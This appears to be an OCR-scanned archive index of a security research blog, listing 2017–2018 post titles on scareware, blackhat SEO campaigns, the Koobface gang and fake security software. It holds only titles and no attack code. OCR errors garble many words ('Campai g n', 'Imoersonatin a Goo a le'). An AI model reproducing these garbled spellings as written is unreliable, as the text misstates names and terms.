■ Book Proposal - Seekin g S ponsorship - Publisher 
Contact (2017-11-15 14:23 ) 

























































2018 


° July. 

■ Historical OSINT - Summarizin g 2 Years of 
Webroot's Threat Blo o Posts Research ( 2018-07- 
28 21:00 ) 

o September 

■ Introducin g Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 
16:30 ) 

o October 

■ Historical OSINT - iPowerWeb Hacked Hundreds 

of Web Sites Affected (2018-10-19 18:17 ) 

■ Historical OSINT - Gumblar Botnet Infects 
Thousands of Sites Serves Adobe Flash Exploits 
( 2018-10-19 22:46 ) 

■ Historical OSINT - A Diverse Portfolio of Fake 

Security Software ( 2018-10-20 20:22 ) 

■ Historical OSINT - Callin g Zeus Home (2018-10- 
20 20:25 ) 

■ Historical OSINT - Chinese Government Sites 

Servin g Malware (2018-10-20 20:28 ) 

■ Historical OSINT - Hundreds of Bo g us Bebo 
Accounts Servin g Malware ( 2018-10-20 20:29 ) 

■ Historical OSINT - PhishTube Twitter Broadcast 

Impersonated Scareware Servin g Twitter 
Accounts Circulatin g ( 2018-10-20 22:10 ) 

■ Historical OSINT - Massive Blackhat SEP 

Campai g n Courtesy of the Koobface Gan g 
S potted in the Wild (2018-10-20 22:28 ) 

■ Historical OSINT - Latvian ISPs . Scareware . and 
the Koobface Gan g Connection (2018-10-20 
22:34 ) 

■ Historical OSINT - Massive Scareware Dro oping 
Campai g n Spotted in the Wild (2018-10-20 
22:38 ) 
































































■ Historical OSINT - Malware Domains 
Imoersonatin a Goo a le (2018-10-20 22:51 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild (2018-10-21 
22:35 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild - Part Two (2018- 
10-21 22:47 ) 

■ Historical OSINT - Ro o ue Scareware Dro oping 
Campai g n Spotted in the Wild Courtesy of the 
KoobfaceGan o ( 2018-10-21 23:02 ) 

■ Historical OSINT - Profilin g a Portfolio of Active 
419-Themecl Scams (2018-10-21 23:08 ) 

■ Historical OSINT - Yet Another Massive Blackhat 

SEP Campai g n Spotted in the Wild (2018-10-21 
23:21 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Drops Scareware 
( 2018-10-21 23:37 ) 

■ Historical OSINT - Yet Another Massive Blackhat 

SEP Campai g n Spotted in the Wild Dro ps 
Scareware (2018-10-21 23:47 ) 

■ Historical OSINT - Soamvertized Swine Flu 
Domains - Part Two (2018-10-21 23:50 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Drops Scareware 
( 2018-10-21 23:55 ) 

■ Historical OSINT - A Diversified Portfolio of Fake 

Security Software ( 2018-10-22 13:33 ) 

■ Historical OSINT - A Diversified Portfolio of Fake 

Security Software Spotted in the Wild (2018-10- 
22 13:40 ) 

■ Historical OSINT - Massive Blackhat SEP 
Campai g n Spotted in the Wild Serves Scareware 
( 2018-10-22 14:05 ) 


































































■ Historical OSINT - Malicious Economies of Scale - 

The Emer g ence of Efficient Platforms for 
Ex ploitation - 2007 (2018-10-22 16:23 ) 

■ Pav-Per-Exoloit Acquisition Vulnerabilit y 
Pro g rams - Pros and cons? (2018-10-22 17:47 ) 

December 

■ C yber Security Pro j ect Investment Proposal - DIA 
Needioedia - Fi g ht Cvbercrime and Cvber l ihad 
With Sensors - Grab Your Co o v Toda y! ( 2018-12- 
16 13:52 ) 




























